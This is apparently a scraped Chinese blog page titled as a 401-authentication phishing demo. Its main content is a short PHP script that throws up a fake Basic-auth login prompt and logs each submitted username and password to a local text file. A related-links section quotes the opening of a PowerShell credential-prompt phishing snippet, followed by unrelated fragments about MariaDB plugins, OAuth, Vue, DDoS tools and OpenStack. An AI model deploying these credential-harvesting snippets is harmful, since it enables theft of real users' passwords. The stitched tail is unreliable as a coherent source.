401认证钓鱼demo

<?php
//@b4dboy
if(!isset($_SERVER[‘PHP_AUTH_USER‘]) && !isset($_SERVER[‘PHP_AUTH_PW‘])) {
    Header("WWW-Authenticate: Basic realm=\"USER LOGIN\"");
    Header("HTTP/1.0 401 Unauthorized");
} else {
    @file_put_contents(‘./b4dboy.txt‘, $_SERVER[‘PHP_AUTH_USER‘].‘|‘.$_SERVER[‘PHP_AUTH_PW‘]."\r\n", FILE_APPEND);
    //xxx
}

    ?>

原文地址:https://www.cnblogs.com/M0rta1s/p/11517486.html

时间: 2024-10-08 05:49:40

401认证钓鱼demo的相关文章

通过powershell实现基础认证钓鱼获得密码

本文来自https://www.secpulse.com/archives/4131.html $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::Server

一个简单的MariaDB认证插件demo

代码地址如下:http://www.demodashi.com/demo/13076.html 一.前言 众所周知(其实可能很多人不知道)MariaDB支持插件认证.在MariaDB中新建用户,常见的语句是: CREATE USER 'username'@'host' IDENTIFIED BY 'password'; 这样创建的用户,登录时的认证方式是密码.其实创建用户的语句还可以是: CREATE USER 'username'@'host' IDENTIFIED VIA 'pluginna

Asp.net Web Api 2 FORM Authentication Demo

最近看了一点 web api 2方面的书,对认证都是简单介绍了下,所以我在这里做个简单Demo,本文主要是FORM Authentication,顺带把基本认证也讲了. Demo 一.FORM Authentication 1.新建asp.net 空项目->Web API,如下图所示: 2.先创建一个简单无认证示例: (1).Models文件夹下新建Product类, /// <summary> /// 产品 /// </summary> public class Produ

使用微服务架构思想,设计部署OAuth2.0授权认证框架

1,授权认证与微服务架构 1.1,由不同团队合作引发的授权认证问题 去年的时候,公司开发一款新产品,但人手不够,将B/S系统的Web开发外包,外包团队使用Vue.js框架,调用我们的WebAPI,但是这些WebAPI并不在一台服务器上,甚至可能是第三方提供的WebAPI.同时处于系统安全的架构设计,后端WebAPI是不能直接暴露在外面的:另一方面,我们这个新产品还有一个C/S系统,C端登录的时候,要求统一到B/S端登录,可以从C端无障碍的访问任意B/S端的页面,也可以调用B/S系统的一些API,

请求经过负载均衡器后连接数据库认证报错

问题背景:client-----------LB----------RS(单台)访问正常 client-----------LB----------RS(多台)访问异常 具体现象:多台RS访问会出现401认证失败 问题原因:rs的session存到本地,两台rs没有共享解决方案:临时开下会话保持就好,长期解决需要共享session. 原文地址:https://www.cnblogs.com/python-cat/p/9123131.html

一步一步学Vue(七)

前言:我以后在文章最后再也不说我下篇博文要写什么,之前说的大家也可以忽略,如果你不忽略,会失望的??,不过说出去的话还是要表示一下的,简单介绍一下路由钩子: 正如其名,vue-router 提供的导航钩子主要用来拦截导航,让它完成跳转或取消.有多种方式可以在路由导航发生时执行钩子:全局的, 单个路由级的, 或者组件级的. 1.全局钩子 使用 router.beforeEach 注册一个全局的 before 钩子: var router = new VueRouter({ ... }) route

Kali Linux 渗透测试之拒绝服务攻击及防御

作为渗透测试人员,有时候需要对客户的系统进行DDOS攻击测试,那么这个时候就需要我们有一款合格的测试工具.而在Kali Linux上就集成了一些DDOS测试工具供测试者使用,下面就简单介绍一些测试工具. kali下的拒绝服务攻击: D(D)OS........................................1 yersinia......................................2 hping3................................

Linux下四款Web服务器压力测试工具(http_load、webbench、ab、siege)介绍

一.http_load程序非常小,解压后也不到100Khttp_load以并行复用的方式运行,用以测试web服务器的吞吐量与负载.但是它不同于大多数压力测试工具,它可以以一个单一的进程运行,一般不会把客户机搞死.还可以测试HTTPS类的网站请求. 下载地址:http://soft.vpser.net/test/http_load/http_load-12mar2006.tar.gz 安装#tar zxvf http_load-12mar2006.tar.gz#cd http_load-12mar

nova 详解

Nova 是什么? Openstack有Rackspace和NASA共同开发的云计算平台,类似于Amozon EC2和S3的云基础架构: 超过140家企业及18470开发者参与. nova在openstack的地位: nova的架构: nova的核心模块: controller: nova-api nova-schedule nova-conductor(数据库代理)负载均衡 nova-consoleauth nova-novncproxy nova-cert compute:nova-comp